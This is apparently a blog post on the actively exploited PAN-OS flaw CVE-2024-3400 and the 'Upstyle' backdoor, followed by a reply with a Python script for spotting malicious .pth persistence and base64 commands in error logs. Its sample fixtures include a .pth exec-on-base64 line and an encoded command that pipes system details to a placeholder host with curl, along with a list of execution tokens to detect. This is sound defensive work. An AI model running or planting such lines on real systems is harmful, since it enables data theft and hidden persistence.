Palo Alto Zero-Day patch download on April 14 2024

Brandon Lee

Security researchers have discovered a zero-day vulnerability in Palo Alto Networks firewalls. The vulnerability is identified as CVE-2024-3400 and has been actively exploited since March 26, 2024, by suspected state-sponsored hackers. It is an unauthenticated remote code execution flaw that affects the PAN-OS software. It compromises network security by enabling attackers to breach networks, steal data, and escalate their access. 

Palo Alto Networks has scheduled patches for release on April 14. In the interim, the company has issued mitigations to help protect users' systems. The exploitation of the vulnerability was first detected by Volexity in the GlobalProtect feature of PAN-OS.

Hackers have installed a custom Python backdoor named 'Upstyle' on compromised devices, which allows for command execution and data theft from internal networks. The backdoor manipulates the system path file to execute commands each time Python starts. The commands are then retrieved, base64-encoded, from web server error logs.

This is a worrying trend of targeting network devices. These are often less protected and directly accessible from the internet. Volexity's ongoing investigation has revealed that this attack is likely the work of a sophisticated, resource-rich state-backed actor, given the complexity and stealthiness of the exploitation.

Companies need to monitor network activity and analyze logs for anomalies, alongside generating Tech Support Files for forensic investigation.

In checking your Palo Alto firewall, you will see updates listed for 4/14/2024:

Posted: 14/04/2024 9:42 pm
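The post describes two artefacts worth hunting for: a Python path configuration file that runs code at interpreter start-up, and base64-encoded tasking hidden in web server error logs. The script below is an added example written for this thread; it is not code from the post, from Volexity, or from Palo Alto Networks. The log format, request paths, file names and .pth contents are constructed assumptions (the real markers used by Upstyle are not quoted in the post, so the decoder is generic), and the sample .pth payload decodes to the no-op `pass` and is never executed.

```python
import base64
import binascii
import re
import string
import tempfile
from pathlib import Path

# --- 1. Persistence via Python path configuration files -------------------
# A .pth file in site-packages is a Python "path configuration file". The site
# module reads it at every interpreter start-up and executes any line that
# begins with "import " (or "import\t"). That is the mechanism behind
# "manipulates the system path file to execute commands each time Python starts".
SUSPICIOUS_PTH_TOKENS = (
    "exec(", "eval(", "compile(", "__import__", "base64", "subprocess", "os.system",
)


def scan_pth_dir(site_packages: Path) -> list[tuple[str, str]]:
    """Return (file name, offending line) for each .pth line that will run
    (starts with 'import') and carries a code-execution token."""
    hits = []
    for pth in sorted(site_packages.glob("*.pth")):
        for line in pth.read_text(errors="replace").splitlines():
            stripped = line.strip()
            if stripped.startswith("import") and any(
                tok in stripped for tok in SUSPICIOUS_PTH_TOKENS
            ):
                hits.append((pth.name, stripped))
    return hits


def write_sample_site_packages(root: Path) -> Path:
    """Constructed fixture (an assumption, not a real device image): one benign
    .pth holding a bare path entry and one shaped like the persistence the post
    describes. The embedded blob decodes to 'pass' and is never executed here."""
    sp = root / "site-packages"
    sp.mkdir(parents=True, exist_ok=True)
    (sp / "vendor-libs.pth").write_text("/opt/vendor/lib/python\n")
    (sp / "system.pth").write_text(
        'import base64, os; exec(base64.b64decode(b"cGFzcw=="))\n'
    )
    return sp


def scan_sample_site_packages() -> list[str]:
    """Build the fixture in a temp dir, scan it, and return flagged file names."""
    with tempfile.TemporaryDirectory() as d:
        return [name for name, _ in scan_pth_dir(write_sample_site_packages(Path(d)))]


# --- 2. Tasking hidden in web server error logs ----------------------------
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
SHELL_HINTS = (" ", ";", "|", "/", "$", "`")
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def _looks_like_command(text: str) -> bool:
    """Printable ASCII containing at least one shell-ish character."""
    return bool(text) and all(c in PRINTABLE for c in text) and any(
        h in text for h in SHELL_HINTS
    )


def find_encoded_commands(log_text: str) -> list[tuple[int, str]]:
    """Return (line number, decoded text) for every base64 run in the log that
    decodes cleanly to printable, shell-looking text."""
    found = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in B64_RUN.finditer(line):
            blob = m.group(0)
            if len(blob) % 4:  # not a whole number of base64 quanta
                continue
            try:
                decoded = base64.b64decode(blob, validate=True).decode("ascii")
            except (binascii.Error, UnicodeDecodeError):
                continue
            if _looks_like_command(decoded):
                found.append((lineno, decoded))
    return found


# Constructed sample log (assumption: an Apache-style error log; the request
# paths are invented and are not the ones used in the real campaign).
_PAYLOAD = base64.b64encode(b"id; uname -a | curl -d @- http://203.0.113.9/").decode()
_BENIGN = base64.b64encode(b"sess-0001-ab").decode()  # looks like a session token
SAMPLE_ERROR_LOG = (
    "2024-04-10 03:11:02 [error] client 203.0.113.7: File does not exist: /css/login.css\n"
    f"2024-04-10 03:11:05 [error] client 203.0.113.7: File does not exist: /portal/status?q={_PAYLOAD}\n"
    f"2024-04-10 03:11:09 [error] client 198.51.100.4: session {_BENIGN} timed out\n"
)

if __name__ == "__main__":
    print("suspicious .pth files:", scan_sample_site_packages())
    for lineno, cmd in find_encoded_commands(SAMPLE_ERROR_LOG):
        print(f"line {lineno}: {cmd!r}")
```

Two caveats when running this against a real box. First, legitimate packages also use executable .pth lines (setuptools ships `distutils-precedence.pth`, whose `import` line calls `__import__`), so every hit needs a human look rather than automatic deletion. Second, the base64 decoder only catches tasking that decodes to plain shell text; an attacker who layers compression or a second encoding on top would slip past it, which is why the post's advice to pull a Tech Support File and review the logs by hand still stands.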